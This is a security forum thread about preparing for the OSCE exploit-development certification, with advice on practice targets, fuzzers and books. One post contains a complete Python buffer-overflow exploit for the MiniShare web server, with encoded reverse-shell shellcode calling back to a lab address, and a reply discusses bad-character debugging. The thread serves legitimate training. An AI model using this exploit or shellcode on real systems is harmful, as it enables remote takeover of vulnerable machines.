.

OSCE advice?

<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Feb 06, 2013 1:37 pm

OSCE advice?

Hi,

For those who are already certified, what advice would give to someone like me who is starting the Cracking the Perimeter course in order to later challenge the OSCE certification?

I have read some stories here and on the internet, but I am curious on what you have done to succeed and what you would change if you were to do it again.

Thanks in advance for you help
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Wed Feb 06, 2013 2:09 pm

Re: OSCE advice?

I listed a couple of useful resources in my review, when I did the OSCE a couple of months ago:



Certainly more than needed for the OSCE exam, though.

I'd recommend to get a couple of vulnerable programs and to try to discover and exploit the vulnerabilities yourself. For appropriate targets you could refer to exploit-db and similar sites. A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

The labs can easily be recreated at home, in case you consider to enroll again for some lab time. Also feel free to ask any specific questions that may arise while you go through the materials. ;)
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Feb 06, 2013 2:11 pm

Re: OSCE advice?

A good practice would also be to try to create exploits that utilize different exploitation techniques than the ones that are publicly available.

Thanks UNIX. But what do you mean by "utilize different exploitation techniques"?
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Wed Feb 06, 2013 2:16 pm

Re: OSCE advice?

I'll second UNIX on all counts.  And likewise, if you need help, drop me a line.

Ultimately, dupe as much as you can, both from the course, and from outside of it.  The more you understand, and can do without too much difficulty, the better.  

Practice, practice, practice.

As you replied to UNIX's post, before I posted - By 'different techniques', try to find OTHER ways to exploit flaws that are noted in the course materials or what you work with from exploit-db, beyond simply using the publicly available exploits.  Also, try to learn how to do things for yourself, rather than simply mimicking / copying exactly what someone has done.  Try to accomplish the same thing, without simply doing exactly as they did.  This applies to both coding and non-coding exercises (such as some of the web exploitation stuff).
Last edited by hayabusa on Wed Feb 06, 2013 2:18 pm, edited 1 time in total.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Wed Feb 06, 2013 2:20 pm

Re: OSCE advice?

For example, you could try to utilize a SEH overwrite in order to get to your shellcode, if the public exploit doesn't take this approach (and if it is applicable to the target application). Another example would be to port the exploit to newer operating systems, which will most likely result in different approaches that are necessary in order to get your shellcode executed when facing increased exploit mitigations, such as DEP, ASLR, etc.
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Wed Feb 06, 2013 2:25 pm

Re: OSCE advice?

Which fuzzer framework would you all recommend? Spike or Peach or ???
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Wed Feb 06, 2013 2:32 pm

Re: OSCE advice?

It depends on what you want to fuzz, e.g. file formats or a network protocol. For commercial fuzzers I'd recommend to take a look at Defensics and beSTORM. As for the free ones, I like Peach, although it takes quite a while until one gets used to it. I also had good results with FOE2.

Eventually it won't hurt to write your own fuzzers though. ;)
Last edited by UNIX on Mon Feb 11, 2013 1:10 pm, edited 1 time in total.
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Feb 06, 2013 2:47 pm

Re: OSCE advice?

I can't elaborate without providing spoilers, but I wish I would have gone through this in advance: http://www.amazon.com/Advanced-Windows- ... 0321374460
The day you stop learning is the day you start becoming obsolete.
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Wed Feb 06, 2013 6:25 pm

Re: OSCE advice?

Ok so can somebody shed some light on this. I am trying to exploit the minishare app from the greycorner. It is a simple buffer overflow exploit. I have already done it the regular way i.e. jmp esp.

However here is what I am trying,

#!/usr/bin/python

import socket

# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 R |msfencode -a x86 -b "\x00" -t c
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

shell_reverse_tcp = ("\xba\xe7\x88\x98\x9a\xd9\xc3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
"\x4f\x31\x50\x14\x03\x50\x14\x83\xc0\x04\x05\x7d\x64\x72\x40"
"\x7e\x95\x83\x32\xf6\x70\xb2\x60\x6c\xf0\xe7\xb4\xe6\x54\x04"
"\x3f\xaa\x4c\x9f\x4d\x63\x62\x28\xfb\x55\x4d\xa9\xca\x59\x01"
"\x69\x4d\x26\x58\xbe\xad\x17\x93\xb3\xac\x50\xce\x3c\xfc\x09"
"\x84\xef\x10\x3d\xd8\x33\x11\x91\x56\x0b\x69\x94\xa9\xf8\xc3"
"\x97\xf9\x51\x58\xdf\xe1\xda\x06\xc0\x10\x0e\x55\x3c\x5a\x3b"
"\xad\xb6\x5d\xed\xfc\x37\x6c\xd1\x52\x06\x40\xdc\xab\x4e\x67"
"\x3f\xde\xa4\x9b\xc2\xd8\x7e\xe1\x18\x6d\x63\x41\xea\xd5\x47"
"\x73\x3f\x83\x0c\x7f\xf4\xc0\x4b\x9c\x0b\x05\xe0\x98\x80\xa8"
"\x27\x29\xd2\x8e\xe3\x71\x80\xaf\xb2\xdf\x67\xd0\xa5\xb8\xd8"
"\x74\xad\x2b\x0c\x0e\xec\x23\xe1\x3c\x0f\xb4\x6d\x37\x7c\x86"
"\x32\xe3\xea\xaa\xbb\x2d\xec\xcd\x91\x89\x62\x30\x1a\xe9\xab"
"\xf7\x4e\xb9\xc3\xde\xee\x52\x14\xde\x3a\xf4\x44\x70\x95\xb4"
"\x34\x30\x45\x5c\x5f\xbf\xba\x7c\x60\x15\xcd\xbb\xf7\x56\x66"
"\x42\x6c\x3f\x75\x44\x7d\xe3\xf0\xa2\x17\x0b\x55\x7d\x80\xb2"
"\xfc\xf5\x31\x3a\x2b\x9d\xd2\xa9\xb0\x5d\x9c\xd1\x6e\x0a\xc9"
"\x24\x67\xde\xe7\x1f\xd1\xfc\xf5\xc6\x1a\x44\x22\x3b\xa4\x45"
"\xa7\x07\x82\x55\x71\x87\x8e\x01\x2d\xde\x58\xff\x8b\x88\x2a"
"\xa9\x45\x66\xe5\x3d\x13\x44\x36\x3b\x1c\x81\xc0\xa3\xad\x7c"
"\x95\xdc\x02\xe9\x11\xa5\x7e\x89\xde\x7c\x3b\xb9\x94\xdc\x6a"
"\x52\x71\xb5\x2e\x3f\x82\x60\x6c\x46\x01\x80\x0d\xbd\x19\xe1"
"\x08\xf9\x9d\x1a\x61\x92\x4b\x1c\xd6\x93\x59")

# stack jmp  \xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1
jmp_back = "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFF\xE1"

# jmp esp \x7E\x42\x93\x53 USER32.dll
jmp_esp = "\x53\x93\x42\x7E"

expl = "\x41" * 1271 + "\x42" * 517 + jmp_esp + "\x90" * 50 + jmp_back + "\x90" * 361

buff = "GET" + expl + "HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = sock.connect(("192.168.1.124",80))
sock.send(buff)
sock.close()



The jmp_esp takes me to our buffer where we could inject shellcode there. However, I decided to try and jump back approx. 512 bytes and try to execute the shellcode.

However no dice......... Thoughts :)
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Feb 06, 2013 7:08 pm

Re: OSCE advice?

Great, thanks for these great responses!

I get the point regarding exploit development: practice all the techniques often and in different conditions.

I will also have a good look at the book you proposed ajohnson!

But what about the other things (web app, router, etc). What do you guys recommend or wish you would have done before the exam? I know I need to practice fuzzing web apps more, that's for sure, and I was planning on playing with the DVWA and other things like that. But what else would you recommend?
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Feb 06, 2013 8:20 pm

Re: OSCE advice?

@DK: I assume you're not sending the shellcode because it doesn't make it there. Otherwise, that would be your first problem ;D

You haven't got all the bad characters out, and even after that, you're not jumping back far enough. You'll currently land in the middle of the shellcode once you correct the characters.

x = ''
for i in range(0, 256):
   x += "\\x%02x" % i
print x

will give you a list of all 256 hex bytes. To start, use that as your shellcode and just keep sending longer and longer lines until it doesn't work, and then strip out a character. I put a break point at the beginning of your jump back and then compared the bytes that were present with what I sent. You could also automate that with pydbg if you're feeling ambitious. There's an example in the courseware.



@HM: There isn't any web app fuzzing; you're fuzzing servers. The course actually covers what you need to know for that. Also, be sure to check out the additional resources in the forums. There are decent lists for most, if not all, modules.
Last edited by dynamik on Wed Feb 06, 2013 8:26 pm, edited 1 time in total.
The day you stop learning is the day you start becoming obsolete.
<<

DragonGorge

User avatar

Jr. Member
Jr. Member

Posts: 86

Joined: Wed Feb 08, 2012 6:30 pm

Post Wed Feb 06, 2013 8:53 pm

Re: OSCE advice?

ajohnson wrote:I can't elaborate without providing spoilers


Hey ajohnson...last I saw you had WIP:OSCE in your sig. You're not already done and on to the next cert are you? If so... :o
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Wed Feb 06, 2013 9:27 pm

Re: OSCE advice?

DragonGorge wrote:Hey ajohnson...last I saw you had WIP:OSCE in your sig. You're not already done and on to the next cert are you? If so... :o


Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ;)

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.
The day you stop learning is the day you start becoming obsolete.
<<

MaXe

User avatar

Hero Member
Hero Member

Posts: 671

Joined: Tue Aug 17, 2010 9:49 am

Post Wed Feb 06, 2013 9:32 pm

Re: OSCE advice?

I'm an InterN0T'er
<<

DragonGorge

User avatar

Jr. Member
Jr. Member

Posts: 86

Joined: Wed Feb 08, 2012 6:30 pm

Post Wed Feb 06, 2013 9:35 pm

Re: OSCE advice?

ajohnson wrote:Hm, maybe you just need to visit the forum more frequently; it said GCIA for about the last six weeks. ;)

I put a very intense 4-6 months into the OSCE, so it's not like I just breezed through it.

Well, like I said, after OSCP I took a hiatus to decompress. Time flies I guess.

How'd it go BTW? Did you write a review?
Next

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software